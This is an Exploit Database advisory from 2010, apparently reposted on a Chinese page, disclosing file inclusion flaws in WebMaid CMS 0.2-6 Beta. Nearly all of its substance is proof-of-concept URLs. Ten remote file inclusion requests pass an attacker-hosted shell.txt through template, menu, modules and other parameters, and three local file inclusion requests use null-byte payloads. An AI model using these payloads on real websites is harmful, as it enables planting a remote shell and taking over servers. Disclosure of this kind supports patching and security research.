WebMaid CMS 0.2-6 Beta – Multiple Remote File Inclusions

• Exploit Database
• 93 阅读

• 作者： cr4wl3r
  日期： 2010-03-21
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/11831/

• ====================================================================
  WebMaid CMS <= 0.2-6 Beta Multiple Remote File Include Vulnerability
  ====================================================================
  
  
  [+] WebMaid CMS <= 0.2-6 Beta Multiple Remote File Include Vulnerability
  
  1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
  0 _ __ __ __ 1
  1 /' \__/'__`\/\ \__/'__`\ 0
  0/\_, \___ /\_\/\_\ \ \___\ \ ,_\/\ \/\ \_ ___ 1
  1\/_/\ \ /' _ `\ \/\ \/_/_\_<_/'___\ \ \/\ \ \ \ \/\`'__\0
  0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
  1\ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
  0 \/_/\/_/\/_/\ \_\ \/___/\/____/ \/__/ \/___/\/_/ 1
  1\ \____/ >> Exploit database separated by exploit 0
  0 \/___/type (local, remote, DoS, etc.)1
  11
  0[+] Site: Inj3ct0r.com0
  1[+] Support e-mail: submit[at]inj3ct0r.com1
  00
  1######################################1
  0I'm cr4wl3rmember from Inj3ct0r Team1
  1######################################0
  0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
  
  [+] Discovered by: cr4wl3r
  [+] My id: http://inj3ct0r.com/author/945
  [+] Original: http://inj3ct0r.com/exploits/11394
  [+] Download: http://code.google.com/p/webmaidcms/downloads/list
  
  [+] PoC RFI:
  [path]/template/babyweb/index.php?template=[attacker.com]/shell.txt???
  [path]/template/babyweb/index.php?menu=[attacker]/shell.txt???
  [path]/template/babyweb/index.php?events=[attacker]/shell.txt???
  [path]/template/babyweb/index.php?SITEROOT=[attacker]/shell.txt???
  [path]/template/calm/footer.php?modules=[attacker]/shell.txt???
  [path]/template/calm/footer.php?copyright=[attacker]/shell.txt???
  [path]/template/calm/top.php?menu=[attacker]/shell.txt???
  [path]/template/wm025/footer.php?modules=[attacker]/shell.txt???
  [path]/template/wm025/footer.php?copyright=[attacker]/shell.txt???
  [path]/template/wm025/footer.php?menu=[attacker]/shell.txt???
  
  [+] PoC LFI:
  [path]/cContactus.php?com=[LFI%00]
  [path]/cGuestbook.php?com=[LFI%00]
  [path]/cArticle.php?com=[LFI%00]
  
  [+] Greetz: All member inj3ct0r.com
  
  
  # Inj3ct0r.com [2010-03-22]
  

  Python

  Copy